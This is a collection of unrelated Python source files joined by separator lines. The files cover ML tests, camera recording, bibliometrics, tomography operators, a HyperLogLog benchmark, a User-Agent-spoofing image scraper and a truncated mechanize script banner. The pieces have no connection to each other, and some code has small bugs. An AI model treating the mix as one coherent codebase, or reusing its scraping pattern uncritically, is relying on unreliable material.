TARGET_DIR = '/app/EMonitor/Script'
|
"""
See: https://pydantic-docs.helpmanual.io/usage/types/#custom-data-types
"""
|
"""
Copyright (c) Facebook, Inc. and its affiliates.
This source code is licensed under the MIT license found in the
LICENSE file in the root directory of this source tree.
"""
import numpy as np
import pytest
import torch
from common.subsample import RandomMaskFunc
@pytest.mark.parametrize("center_fracs, accelerations, batch_size, dim", [
([0.2], [4], 4, 320),
([0.2, 0.4], [4, 8], 2, 368),
])
def test_random_mask_reuse(center_fracs, accelerations, batch_size, dim):
mask_func = RandomMaskFunc(center_fracs, accelerations)
shape = (batch_size, dim, dim, 2)
mask1 = mask_func(shape, seed=123)
mask2 = mask_func(shape, seed=123)
mask3 = mask_func(shape, seed=123)
assert torch.all(mask1 == mask2)
assert torch.all(mask2 == mask3)
@pytest.mark.parametrize("center_fracs, accelerations, batch_size, dim", [
([0.2], [4], 4, 320),
([0.2, 0.4], [4, 8], 2, 368),
])
def test_random_mask_low_freqs(center_fracs, accelerations, batch_size, dim):
mask_func = RandomMaskFunc(center_fracs, accelerations)
shape = (batch_size, dim, dim, 2)
mask = mask_func(shape, seed=123)
mask_shape = [1 for _ in shape]
mask_shape[-2] = dim
assert list(mask.shape) == mask_shape
num_low_freqs_matched = False
for center_frac in center_fracs:
num_low_freqs = int(round(dim * center_frac))
pad = (dim - num_low_freqs + 1) // 2
if np.all(mask[pad:pad + num_low_freqs].numpy() == 1):
num_low_freqs_matched = True
assert num_low_freqs_matched
|
from picamera import PiCamera, Color
import time
import sys
camera = PiCamera()
camera.annotate_text_size = 32
camera.annotate_background = Color("black")
camera.annotate_foreground = Color("white")
#camera.resolution = (576, 324)
camera.resolution = (1152, 648)
#camera.resolution = (1920, 1080)
#recordtime = 1795 #1 hour - 5 seconds to allow for camera reset
recordtime = 595
aCount = 0
while (1 == 1):
try:
localtime = time.localtime(time.time())
filename = time.strftime("%Y%m%d%H%M%S", localtime)
timestamp = time.asctime(localtime)
print(timestamp);
filepath = "/home/pi/camera/video/" + filename + ".h264"
camera.start_preview(fullscreen=False, window=(100,100,1152,648))
print("start preview")
camera.start_recording(filepath)
print("start recording")
#print("Recording started: " + timestamp)
count = 0
while(count < recordtime):
localtime = time.localtime(time.time())
timestamp = time.asctime(localtime)
#camera.annotate_text = timestamp
camera.annotate_text = str(aCount)
camera.wait_recording(1)
count = count + 1
aCount = aCount + 1
except:
e = sys.exc_info()[0]
print(e)
finally:
camera.stop_recording()
print("stop recording")
camera.stop_preview()
print("stop preview")
time.sleep(5)#needed to reset camera
|
"""
Apply Thesaurus
===============================================================================
>>> from techminer2 import *
>>> directory = "data/"
>>> create_thesaurus(
... column="author_keywords",
... thesaurus_file="test_thesaurus.txt",
... sep="; ",
... directory=directory,
... )
- INFO - Creating thesaurus ...
- INFO - Thesaurus file 'data/processed/test_thesaurus.txt' created.
>>> apply_thesaurus(
... thesaurus_file="keywords.txt",
... input_column="author_keywords",
... output_column="author_keywords_thesaurus",
... strict=False,
... directory=directory,
... )
- INFO - The thesaurus file 'keywords.txt' was applied to column 'author_keywords'.
"""
import os
from . import logging
from ._read_records import read_filtered_records
from .map_ import map_
from .thesaurus import read_textfile
def apply_thesaurus(
thesaurus_file,
input_column,
output_column,
strict,
directory="./",
):
def apply_strict(x):
return thesaurus.apply_as_dict(x, strict=True)
def apply_unstrict(x):
return thesaurus.apply_as_dict(x, strict=False)
documents = read_filtered_records(directory)
thesaurus = read_textfile(os.path.join(directory, "processed", thesaurus_file))
thesaurus = thesaurus.compile_as_dict()
if strict:
documents[output_column] = map_(documents, input_column, apply_strict)
else:
documents[output_column] = map_(documents, input_column, apply_unstrict)
documents.to_csv(os.path.join(directory, "processed", "documents.csv"), index=False)
logging.info(
f"The thesaurus file '{thesaurus_file}' was applied to column '{input_column}'."
)
|
# Rahil Mehrizi, Oct 2018
"""Saving and Loading Checkpoint"""
import os, shutil
import torch
class Checkpoint():
def __init__(self, opt):
self.opt = opt
exp_dir = os.path.join(opt.exp_dir, opt.exp_id)
if opt.resume_prefix != '':
if 'pth' in opt.resume_prefix:
trunc_index = opt.resume_prefix.index('pth')
opt.resume_prefix = opt.resume_prefix[0:trunc_index - 1]
self.save_path = os.path.join(exp_dir, opt.resume_prefix)
else:
self.save_path = exp_dir
self.save_dir = os.path.join(opt.exp_dir, opt.exp_id)
def save_checkpoint(self, net, train_history, name):
lr_prefix = ('/lr-%.15f' % train_history.lr[-1]['lr']).rstrip('0').rstrip('.')
save_path = self.save_path + lr_prefix + ('-%d.pth.tar' % train_history.epoch[-1]['epoch'])
checkpoint = { 'train_history': train_history.state_dict(),
'state_dict': net.state_dict()}
torch.save( checkpoint, save_path )
print("=> saving '{}'".format(save_path))
if train_history.is_best:
print("=> saving '{}'".format(self.save_dir +'/' + name))
save_path2 = os.path.join(self.save_dir, name)
shutil.copyfile(save_path, save_path2)
def load_checkpoint(self, net, train_history, name):
save_path = self.save_dir + name
self.save_path = self.save_path
if os.path.isfile(save_path):
print("=> loading checkpoint '{}'".format(save_path))
checkpoint = torch.load(save_path)
train_history.load_state_dict( checkpoint['train_history'] )
new_params = net.state_dict() #new layers
old_params = checkpoint['state_dict'] #from checkpoint
new_params.update(old_params)
net.load_state_dict(new_params)
else:
print("=> no checkpoint found at '{}'".format(save_path))
|
import tensorflow as tf
from tensorflow.python.framework import graph_util
sess = tf.InteractiveSession()
#1 2 2 3
input=tf.constant([[[[1,2,3], [4,5,6]], [[7,8,9], [10,11,12]]]])
op = tf.pad(input, [3,1,2,0], name='transpose_self')
target=op.eval();
print(target)
#constant_graph = graph_util.convert_variables_to_constants(sess, sess.graph_def, ['transpose_self'])
#
#with tf.gfile.FastGFile("transpose.pb", mode='wb') as f:
# f.write(constant_graph.SerializeToString());
|
import numpy as np
import torch
from aw_nas.dataset.data_augmentation import Preproc
class TrainAugmentation(object):
def __init__(self, size, mean, std, norm_factor=255., bias=0.):
"""
Args:
size: the size the of final image.
mean: mean pixel value per channel.
"""
self.mean = mean
self.std = std
self.norm_factor = norm_factor
self.bias = bias
self.preproc = Preproc(size, 0.6)
def __call__(self, img, boxes, labels):
"""
Args:
img: the output of cv.imread in RGB layout.
boxes: boundding boxes in the form of (x1, y1, x2, y2).
labels: labels of boxes.
"""
img, boxes, labels = self.preproc(img, boxes, labels)
img /= self.norm_factor
img += self.bias
img -= np.array([self.mean]).reshape(-1, 1, 1)
img /= np.array([self.std]).reshape(-1, 1, 1)
return img, boxes, labels
class TestTransform(object):
def __init__(self, size, mean=0.0, std=1.0, norm_factor=255., bias=0.):
self.mean = mean
self.std = std
self.norm_factor = norm_factor
self.bias = bias
self.preproc = Preproc(size, -1)
def __call__(self, image, boxes, labels):
img, boxes, labels = self.preproc(image, boxes, labels)
img /= self.norm_factor
img += self.bias
img -= np.array([self.mean]).reshape(-1, 1, 1)
img /= np.array([self.std]).reshape(-1, 1, 1)
return img, boxes, labels
|
from torchquant.qmodule import *
from torchquant.utils import *
from torchquant.range_observers import *
|
from unittest.mock import patch
import pytest
from requests_cache.backends import DynamoDbCache, DynamoDbDict
from tests.conftest import AWS_OPTIONS, fail_if_no_connection
from tests.integration.base_cache_test import BaseCacheTest
from tests.integration.base_storage_test import BaseStorageTest
# Run this test module last, since the DynamoDB container takes the longest to initialize
pytestmark = pytest.mark.order(-1)
@pytest.fixture(scope='module', autouse=True)
@fail_if_no_connection
def ensure_connection():
"""Fail all tests in this module if DynamoDB is not running"""
import boto3
client = boto3.client('dynamodb', **AWS_OPTIONS)
client.describe_limits()
class TestDynamoDbDict(BaseStorageTest):
storage_class = DynamoDbDict
init_kwargs = AWS_OPTIONS
picklable = True
@patch('requests_cache.backends.dynamodb.boto3.resource')
def test_connection_kwargs(self, mock_resource):
"""A spot check to make sure optional connection kwargs gets passed to connection"""
DynamoDbDict('test', region_name='us-east-2', invalid_kwarg='???')
mock_resource.assert_called_with('dynamodb', region_name='us-east-2')
class TestDynamoDbCache(BaseCacheTest):
backend_class = DynamoDbCache
init_kwargs = AWS_OPTIONS
|
# -*- coding: utf-8 -*-
# This work is part of the Core Imaging Library (CIL) developed by CCPi
# (Collaborative Computational Project in Tomographic Imaging), with
# substantial contributions by UKRI-STFC and University of Manchester.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy
import functools
from cil.framework import ImageData, BlockDataContainer, DataContainer
from cil.optimisation.operators import Operator, LinearOperator
from cil.framework import BlockGeometry
try:
from sirf import SIRF
from sirf.SIRF import DataContainer as SIRFDataContainer
has_sirf = True
except ImportError as ie:
has_sirf = False
class BlockOperator(Operator):
r'''A Block matrix containing Operators
The Block Framework is a generic strategy to treat variational problems in the
following form:
.. math::
\min Regulariser + Fidelity
BlockOperators have a generic shape M x N, and when applied on an
Nx1 BlockDataContainer, will yield and Mx1 BlockDataContainer.
Notice: BlockDatacontainer are only allowed to have the shape of N x 1, with
N rows and 1 column.
User may specify the shape of the block, by default is a row vector
Operators in a Block are required to have the same domain column-wise and the
same range row-wise.
'''
__array_priority__ = 1
def __init__(self, *args, **kwargs):
'''
Class creator
Note:
Do not include the `self` parameter in the ``Args`` section.
Args:
:param: vararg (Operator): Operators in the block.
:param: shape (:obj:`tuple`, optional): If shape is passed the Operators in
vararg are considered input in a row-by-row fashion.
Shape and number of Operators must match.
Example:
BlockOperator(op0,op1) results in a row block
BlockOperator(op0,op1,shape=(1,2)) results in a column block
'''
self.operators = args
shape = kwargs.get('shape', None)
if shape is None:
shape = (len(args),1)
self.shape = shape
n_elements = functools.reduce(lambda x,y: x*y, shape, 1)
if len(args) != n_elements:
raise ValueError(
'Dimension and size do not match: expected {} got {}'
.format(n_elements,len(args)))
# TODO
# until a decent way to check equality of Acquisition/Image geometries
# required to fullfil "Operators in a Block are required to have the same
# domain column-wise and the same range row-wise."
# let us just not check if column/row-wise compatible, which is actually
# the same achieved by the column_wise_compatible and row_wise_compatible methods.
# # test if operators are compatible
# if not self.column_wise_compatible():
# raise ValueError('Operators in each column must have the same domain')
# if not self.row_wise_compatible():
# raise ValueError('Operators in each row must have the same range')
def column_wise_compatible(self):
'''Operators in a Block should have the same domain per column'''
rows, cols = self.shape
compatible = True
for col in range(cols):
column_compatible = True
for row in range(1,rows):
dg0 = self.get_item(row-1,col).domain_geometry()
dg1 = self.get_item(row,col).domain_geometry()
if hasattr(dg0,'handle') and hasattr(dg1,'handle'):
column_compatible = True and column_compatible
else:
column_compatible = dg0.__dict__ == dg1.__dict__ and column_compatible
compatible = compatible and column_compatible
return compatible
def row_wise_compatible(self):
'''Operators in a Block should have the same range per row'''
rows, cols = self.shape
compatible = True
for row in range(rows):
row_compatible = True
for col in range(1,cols):
dg0 = self.get_item(row,col-1).range_geometry()
dg1 = self.get_item(row,col).range_geometry()
if hasattr(dg0,'handle') and hasattr(dg1,'handle'):
row_compatible = True and column_compatible
else:
row_compatible = dg0.__dict__ == dg1.__dict__ and row_compatible
compatible = compatible and row_compatible
return compatible
def get_item(self, row, col):
'''returns the Operator at specified row and col'''
if row > self.shape[0]:
raise ValueError('Requested row {} > max {}'.format(row, self.shape[0]))
if col > self.shape[1]:
raise ValueError('Requested col {} > max {}'.format(col, self.shape[1]))
index = row*self.shape[1]+col
return self.operators[index]
def norm(self, **kwargs):
'''Returns the norm of the BlockOperator
if the operator in the block do not have method norm defined, i.e. they are SIRF
AcquisitionModel's we use PowerMethod if applicable, otherwise we raise an Error
'''
norm = []
for op in self.operators:
if hasattr(op, 'norm'):
norm.append(op.norm(**kwargs) ** 2.)
else:
# use Power method
if op.is_linear():
norm.append(
LinearOperator.PowerMethod(op, 20)[0]
)
else:
raise TypeError('Operator {} does not have a norm method and is not linear'.format(op))
return numpy.sqrt(sum(norm))
def direct(self, x, out=None):
'''Direct operation for the BlockOperator
BlockOperator work on BlockDataContainer, but they will work on DataContainers
and inherited classes by simple wrapping the input in a BlockDataContainer of shape (1,1)
'''
if not isinstance (x, BlockDataContainer):
x_b = BlockDataContainer(x)
else:
x_b = x
shape = self.get_output_shape(x_b.shape)
res = []
if out is None:
for row in range(self.shape[0]):
for col in range(self.shape[1]):
if col == 0:
prod = self.get_item(row,col).direct(x_b.get_item(col))
else:
prod += self.get_item(row,col).direct(x_b.get_item(col))
res.append(prod)
return BlockDataContainer(*res, shape=shape)
else:
tmp = self.range_geometry().allocate()
for row in range(self.shape[0]):
for col in range(self.shape[1]):
if col == 0:
self.get_item(row,col).direct(
x_b.get_item(col),
out=out.get_item(row))
else:
a = out.get_item(row)
self.get_item(row,col).direct(
x_b.get_item(col),
out=tmp.get_item(row))
a += tmp.get_item(row)
def adjoint(self, x, out=None):
'''Adjoint operation for the BlockOperator
BlockOperator may contain both LinearOperator and Operator
This method exists in BlockOperator as it is not known what type of
Operator it will contain.
BlockOperator work on BlockDataContainer, but they will work on DataContainers
and inherited classes by simple wrapping the input in a BlockDataContainer of shape (1,1)
Raises: ValueError if the contained Operators are not linear
'''
if not self.is_linear():
raise ValueError('Not all operators in Block are linear.')
if not isinstance (x, BlockDataContainer):
x_b = BlockDataContainer(x)
else:
x_b = x
shape = self.get_output_shape(x_b.shape, adjoint=True)
if out is None:
res = []
for col in range(self.shape[1]):
for row in range(self.shape[0]):
if row == 0:
prod = self.get_item(row, col).adjoint(x_b.get_item(row))
else:
prod += self.get_item(row, col).adjoint(x_b.get_item(row))
res.append(prod)
if self.shape[1]==1:
# the output is a single DataContainer, so we can take it out
return res[0]
else:
return BlockDataContainer(*res, shape=shape)
else:
for col in range(self.shape[1]):
for row in range(self.shape[0]):
if row == 0:
if issubclass(out.__class__, DataContainer) or \
( has_sirf and issubclass(out.__class__, SIRFDataContainer) ):
self.get_item(row, col).adjoint(
x_b.get_item(row),
out=out)
else:
op = self.get_item(row,col)
self.get_item(row, col).adjoint(
x_b.get_item(row),
out=out.get_item(col))
else:
if issubclass(out.__class__, DataContainer) or \
( has_sirf and issubclass(out.__class__, SIRFDataContainer) ):
out += self.get_item(row,col).adjoint(
x_b.get_item(row))
else:
a = out.get_item(col)
a += self.get_item(row,col).adjoint(
x_b.get_item(row),
)
def is_linear(self):
'''returns whether all the elements of the BlockOperator are linear'''
return functools.reduce(lambda x, y: x and y.is_linear(), self.operators, True)
def get_output_shape(self, xshape, adjoint=False):
'''returns the shape of the output BlockDataContainer
A(N,M) direct u(M,1) -> N,1
A(N,M)^T adjoint u(N,1) -> M,1
'''
rows , cols = self.shape
xrows, xcols = xshape
if xcols != 1:
raise ValueError('BlockDataContainer cannot have more than 1 column')
if adjoint:
if rows != xrows:
raise ValueError('Incompatible shapes {} {}'.format(self.shape, xshape))
return (cols,xcols)
if cols != xrows:
raise ValueError('Incompatible shapes {} {}'.format((rows,cols), xshape))
return (rows,xcols)
def __rmul__(self, scalar):
'''Defines the left multiplication with a scalar
:paramer scalar: (number or iterable containing numbers):
Returns: a block operator with Scaled Operators inside'''
if isinstance (scalar, list) or isinstance(scalar, tuple) or \
isinstance(scalar, numpy.ndarray):
if len(scalar) != len(self.operators):
raise ValueError('dimensions of scalars and operators do not match')
scalars = scalar
else:
scalars = [scalar for _ in self.operators]
# create a list of ScaledOperator-s
ops = [ v * op for v,op in zip(scalars, self.operators)]
#return BlockScaledOperator(self, scalars ,shape=self.shape)
return type(self)(*ops, shape=self.shape)
@property
def T(self):
'''Return the transposed of self
input in a row-by-row'''
newshape = (self.shape[1], self.shape[0])
oplist = []
for col in range(newshape[1]):
for row in range(newshape[0]):
oplist.append(self.get_item(col,row))
return type(self)(*oplist, shape=newshape)
def domain_geometry(self):
'''returns the domain of the BlockOperator
If the shape of the BlockOperator is (N,1) the domain is a ImageGeometry or AcquisitionGeometry.
Otherwise it is a BlockGeometry.
'''
if self.shape[1] == 1:
# column BlockOperator
return self.get_item(0,0).domain_geometry()
else:
# get the geometries column wise
# we need only the geometries from the first row
# since it is compatible from __init__
tmp = []
for i in range(self.shape[1]):
tmp.append(self.get_item(0,i).domain_geometry())
return BlockGeometry(*tmp)
#shape = (self.shape[0], 1)
#return BlockGeometry(*[el.domain_geometry() for el in self.operators],
# shape=self.shape)
def range_geometry(self):
'''returns the range of the BlockOperator'''
tmp = []
for i in range(self.shape[0]):
tmp.append(self.get_item(i,0).range_geometry())
return BlockGeometry(*tmp)
#shape = (self.shape[1], 1)
#return BlockGeometry(*[el.range_geometry() for el in self.operators],
# shape=shape)
def sum_abs_row(self):
res = []
for row in range(self.shape[0]):
for col in range(self.shape[1]):
if col == 0:
prod = self.get_item(row,col).sum_abs_row()
else:
prod += self.get_item(row,col).sum_abs_row()
res.append(prod)
if self.shape[1]==1:
tmp = sum(res)
return ImageData(tmp)
else:
return BlockDataContainer(*res)
def sum_abs_col(self):
res = []
for row in range(self.shape[0]):
for col in range(self.shape[1]):
if col == 0:
prod = self.get_item(row, col).sum_abs_col()
else:
prod += self.get_item(row, col).sum_abs_col()
res.append(prod)
return BlockDataContainer(*res)
def __len__(self):
return len(self.operators)
def __getitem__(self, index):
'''returns the index-th operator in the block irrespectively of it's shape'''
return self.operators[index]
if __name__ == '__main__':
from cil.framework import ImageGeometry
from cil.optimisation.operators import GradientOperator, IdentityOperator, \
SparseFiniteDifferenceOperator, SymmetrisedGradientOperator, ZeroOperator
M, N = 4, 3
ig = ImageGeometry(M, N)
arr = ig.allocate('random_int')
G = GradientOperator(ig)
Id = IdentityOperator(ig)
B = BlockOperator(G, Id)
print(B.sum_abs_row())
#
Gx = SparseFiniteDifferenceOperator(ig, direction=1, bnd_cond='Neumann')
Gy = SparseFiniteDifferenceOperator(ig, direction=0, bnd_cond='Neumann')
d1 = abs(Gx.matrix()).toarray().sum(axis=0)
d2 = abs(Gy.matrix()).toarray().sum(axis=0)
d3 = abs(Id.matrix()).toarray().sum(axis=0)
d_res = numpy.reshape(d1 + d2 + d3, ig.shape, 'F')
print(d_res)
#
z1 = abs(Gx.matrix()).toarray().sum(axis=1)
z2 = abs(Gy.matrix()).toarray().sum(axis=1)
z3 = abs(Id.matrix()).toarray().sum(axis=1)
#
z_res = BlockDataContainer(BlockDataContainer(ImageData(numpy.reshape(z2, ig.shape, 'F')),\
ImageData(numpy.reshape(z1, ig.shape, 'F'))),\
ImageData(numpy.reshape(z3, ig.shape, 'F')))
#
ttt = B.sum_abs_col()
#
#TODO this is not working
# numpy.testing.assert_array_almost_equal(z_res[0][0].as_array(), ttt[0][0].as_array(), decimal=4)
# numpy.testing.assert_array_almost_equal(z_res[0][1].as_array(), ttt[0][1].as_array(), decimal=4)
# numpy.testing.assert_array_almost_equal(z_res[1].as_array(), ttt[1].as_array(), decimal=4)
u = ig.allocate('random_int')
z1 = B.direct(u)
res = B.range_geometry().allocate()
B.direct(u, out = res)
###########################################################################
# Block Operator for TGV reconstruction
M, N = 2,3
ig = ImageGeometry(M, N)
ag = ig
op11 = GradientOperator(ig)
op12 = IdentityOperator(op11.range_geometry())
op22 = SymmetrisedGradientOperator(op11.domain_geometry())
op21 = ZeroOperator(ig, op22.range_geometry())
op31 = IdentityOperator(ig, ag)
op32 = ZeroOperator(op22.domain_geometry(), ag)
operator = BlockOperator(op11, -1*op12, op21, op22, op31, op32, shape=(3,2) )
z1 = operator.domain_geometry()
z2 = operator.range_geometry()
print(z1.shape)
print(z2.shape)
|
import os
from setuptools import setup, find_packages
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
setup(
name='django-envelope',
version=__import__('envelope').__version__,
description='A contact form app for Django',
long_description=read('README.rst'),
author='Zbigniew Siciarz',
author_email='zbigniew@siciarz.net',
url='http://github.com/zsiciarz/django-envelope',
download_url='http://pypi.python.org/pypi/django-envelope',
license='MIT',
install_requires=['Django>=1.8'],
packages=find_packages(exclude=['example_project', 'tests']),
include_package_data=True,
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Topic :: Utilities',
],
)
|
import pandas as pd
from scipy.stats import chi2_contingency
import random
def test_chiquadro(dataset,variabile_target, lista_variabili, index ):
""" Data una variabile target e una lista di variabili indipendenti, si ottiene
il test del chi2 tra la variabile target e tutte le variabili di interesse e i
relativi parametri di interesse in un dataframe
Richiede la libreria scipy e la libreria pandas
--------------------------
Parametri:
dataset: il dataset di riferimento
variabile_target: la variabile risposta
lista_variabili: lista delle variabili indipendenti di interesse (lista anche se fosse una)
index: lista degli indici da attribuire a ciascuna osservazione (cioè le diverse variabili)
--------------------------
Output: dataframe con valore del chi2, p_value, gradi di libertà, e la significativa al 5%
del test """
chi2, p_value, dof, ex = [],[],[],[]
for variabile in lista_variabili:
chi2.append(chi2_contingency(pd.crosstab(variabile_target,variabile))[0])
p_value.append(chi2_contingency(pd.crosstab(variabile_target,variabile))[1])
dof.append(chi2_contingency(pd.crosstab(variabile_target,variabile))[2])
ex.append(chi2_contingency(pd.crosstab(variabile_target,variabile))[3])
chi2_dataset = pd.DataFrame(data = {"chi2": chi2,
"p_value":p_value,
"degree of freedom":dof},
index = index
)
sign_0 = []
for i in range(len(chi2_dataset)):
if chi2_dataset["p_value"][i] < 0.05:
sign_0.append(True)
else:
sign_0.append(False)
chi2_dataset["sign_0.05"] = sign_0
return chi2_dataset
def imputazione_proporzionale(dataset, variabile):
""" Imputazione dei dati mancanti a ciascuna categoria
secondo la proporzionalità dei casi all'interno del dataset
-------------------
Parametri:
dataset: il dataset di riferimento
variabile: stringa della variabile per cui vogliamo imputare dati mancanti
--------------------
Output:
dataset con i dati imputati alla variabile di riferimento """
e = dataset[variabile].dropna().value_counts()/len(dataset[variabile].dropna())*100
len_index = len(dataset[dataset[variabile].isna()].index)
for i in range(len(e)):
print("""Il {:.2f}% delle osservazioni appartiene alla categoria "{}" """.format(e[i],e.index[i]))
random.seed(42)
dataset_index = dataset[dataset[variabile].isna()].index
for categoria,valore in zip(e.index,e):
idx_Pr = random.sample(list(dataset_index), k = round(valore*len_index/100))
dataset.loc[idx_Pr] = dataset.fillna({variabile : categoria})
dataset_index = dataset_index.drop(idx_Pr)
return dataset
|
import random
import math
from typing import List
import numpy as np
# from hyperLogLogKtob import HyperLogLog
# from registersKtob import registers
from hashSuggested import hash_A
from rhoSuggested import rho
m = 256
N = 500000
sigma = 1.04/math.sqrt(m)
stdv1plus = N*(1+sigma)
stdv1min = N*(1-sigma)
stdv2plus = N*(1+2*sigma)
stdv2min = N*(1-2*sigma)
def f(x):
res = ((x*0xbc164501) & 0x7fffffff) >> 23
return res
A = [0x21ae4036,
0x32435171,
0xac3338cf,
0xea97b40c,
0x0e504b22,
0x9ff9a4ef,
0x111d014d,
0x934f3787,
0x6cd079bf,
0x69db5c31,
0xdf3c28ed,
0x40daf2ad,
0x82a5891c,
0x4659c7b0,
0x73dc0ca8,
0xdad3aca2,
0x00c74c7e,
0x9a2521e2,
0xf38eb6aa,
0x64711ab6,
0x5823150a,
0xd13a3a9a,
0x30a5aa04,
0x0fb9a1da,
0xef785119,
0xc9f0b067,
0x1e7dde42,
0xdda4a7b2,
0x1a1c2640,
0x297c0633,
0x744edb48,
0x19adce93 ]
def inputGenerator(n: int, seed: int) -> List[int]:
list= []
for i in range(0,n):
random.seed(i+seed)
l = random.getrandbits(32)
list.append(l)
return list
results = {'std1': 0, 'std2': 0}
def HyperLogLog():
alfaM = 0.7213/(1 + 1.079/m)
sum = 0
for i in range(0,m):
sum += math.pow(2, -M[i])
n = alfaM * math.pow(m, 2) * (math.pow(sum, -1))
V = 0
pow2 = math.pow(2,32)
for x in M:
if(x==0):
V += 1
if (n <= ((5/2)*m)) and V > 0:
return m*(math.log(m/V))
if (n > (1/30)*pow2):
n = -pow2*(math.log(1-(n/pow2)))
return n
def benchmark():
hyperLog = HyperLogLog()
print(hyperLog)
if (hyperLog <= stdv1plus and hyperLog >= stdv1min):
current = results.get('std1')
current += 1
results['std1'] = current
if (hyperLog <= stdv2plus and hyperLog >= stdv2min and (hyperLog > stdv1plus or hyperLog < stdv1min)):
current = results.get('std2')
current += 1
results['std2'] = current
def registers(x: int):
resF = f(x)
resHash = hash_A(A, x)
resRho = rho(resHash)
if(resRho > M[resF]):
M[resF] = resRho
# print(M[resF])
input = inputGenerator(N, 3)
for i in range(0,10):
M = [0]*m
for val in input:
registers(val)
benchmark()
print(results)
# def write_latex_tabular(ns: List[int],
# res: np.ndarray ,
# filename: str):
# with open(filename ,'w') as f:
# f.write(r'\begin{tabular }{rrr}' + '\n')
# f.write(r'$n$& Average & Standard deviation ')
# f.write(r'\\ \hline' + '\n')
# for i in range(len(ns)):
# fields = [str(ns[i]),
# '{:.6f}'.format(res[i,0]),
# '{:.6f}'.format(res[i,1])]
# f.write('&'.join(fields) + r'\\' + '\n')
# f.write(r'\end{tabular}' + '\n')
|
import urllib.request
import re
import time
import os
# 流程
# 请求->处理->返回
# 1.获取首页url 2.获取首页url里的图片url 3.获取图片url的值 4.创建文文件夹保存
# 多线程爬取
class Mzimg(object):
# 获取html源码
def get_html(self,url):
headers = {
'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0'
}
# 添加headers
request = urllib.request.Request(url=url,headers=headers)
try:
# 获取页面源码
resp = urllib.request.urlopen(request,timeout=10)
# 用gbk解析页面源码(使用utf-8会出错) 并对内容进行切片(因为正则会匹配到其他不相干内容,所以对内容进行切片,以保证指定区域url被爬取) 并返回
# 经过不断调试 切片区块为[6800:-4800]
result = resp.read().decode('gbk',errors='ignore')[6800:-4800]
result_lenth = len(result)
return result,result_lenth
except:
print("[-] 请求失败 可能网络故障")
return False
# 获取首页url
def get_page_url(self,url):
# 获取源码
print("[*] 正在请求url:%s" %(url))
try:
res,res_len = self.get_html(url)
print("[+] 字节:%d"%(res_len))
'''
f = open('/home/yangfan/Code/Python/_urllib/file_name.txt','w')
f.write(res)
f.close()
'''
# 正则匹配url
list1 = re.findall('https://www.meizitu.com/a/\d{1,5}.html',res)
page_url_list=[]
# 去掉重复url
for i in list1:
if i not in page_url_list:
page_url_list.append(i)
#print(url_list)
print("[+] url:%s"%(url))
print("[+] 获取url数量:%d"%(len(page_url_list)))
# 返回页面所有url
return page_url_list
except:
print("[-] 请求失败")
return False
# 获取page页面的所有img_url
def get_img_url(self,page_url):
print("[*] 正在请求url:%s"%(page_url))
try:
res,res_len = self.get_html(page_url)
list1 = re.findall("http://pic.topmeizi.com/wp-content/uploads/\d{4}a/\d{2}/\d{2}/\d{2}.jpg",res)
#print(list1)
img_url_list = []
# 去掉重复的url
for i in list1:
if i not in img_url_list:
img_url_list.append(i)
print("[+] url:%s"%(page_url))
print("[+] 获取url数量:%d"%(len(img_url_list)))
# 返回page_url 下的所有img_url
return img_url_list
except:
print("[-] 请求失败 可能网络故障")
return False
# 获取img_value (图片二进制)
def get_img_value(self,img_url):
print("[*] 正在请求url:%s"%(img_url))
headers = {
'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0'
}
# 添加headers
request = urllib.request.Request(url=img_url,headers=headers)
# 获取页面源码
try:
resp = urllib.request.urlopen(request,timeout=10)
print("[+] 请求成功")
# print("[]")
# print(resp.read())
print("[+] url:%s"%(img_url))
print("[*] 正在保存:%s"%(img_url[-18:]))
return resp.read()
except:
print("[-] 请求失败")
return False
# 创建路径
def crea_folder(self,path):
# 去除首尾空格
path = path.strip()
# 去除尾部\符号
path = path.rstrip("\\")
# 判断路径是否存在
isExists = os.path.exists(path)
if not isExists:
os.makedirs(path)
print("[+] 路径:%s Create Success"%(path))
# 切换到创建的路径
# os.chdir(path)
return True
else:
print("[+] 路径:%s 存在"%(path))
# os.chdir(path)
return False
# 保存图片二进制为文件
def save_img(self,img_name,img_value):
try:
with open(img_name,'wb+') as f:
f.write(img_value)
print("[+] 保存成功")
f.close()
except:
print("[-] 保存失败")
return False
|
import numpy as np
from src.celosia import Celosia
from multiprocessing import freeze_support
#*************************************************************************
# An illustration example as presented in the following paper:
# Celosia: A Comprehensive Anomaly Detection Framework for Smart Cities
#*************************************************************************
def count_ones(n):
# count the number of '1's in t a number's binary representation.
return bin(n).count('1')
def to_bin_list(n, width):
# convert a number of binary list with the specified width
return [int(x) for x in '{:0{size}b}'.format(n,size=width)]
def create_xor_np_array(n):
'''Crate an n-input XOR gate and returns inputs and outputs as numpy arrays.'''
N = 2 ** n
li = []
lo = []
for i in range(N):
li.append(to_bin_list(i, n))
o = 0
if (count_ones(i) % 2):
# number of '1's is odd
o = 1
lo.append([o])
inputs = np.array(li)
outputs = np.array(lo)
return (inputs, outputs)
if __name__ == '__main__':
freeze_support()
(inputs, outputs) = create_xor_np_array(8)
config = {
'N':10, # number of different network structures to try
#'view': True, # view the PDF file
}
celosia = Celosia()
celosia.create_optimal_network('8-XOR',inputs, outputs, config)
# https://github.com/alexarnimueller/som/blob/master/som.py
|
import time
import os
os.system('clear')
time.sleep(0.5)
try:
import mechanize
except ModuleNotFoundError:
print '[!] Module >Mechanize< Not Found!\n This module is only available in python 2.x :/\n Please install mechanize (pip install mechanize) and run the program with python2'
exit()
print """
\033[1;92m O
\033[1;92m M
\033[1;92m A
\033[1;96m R
\033[1;96m A
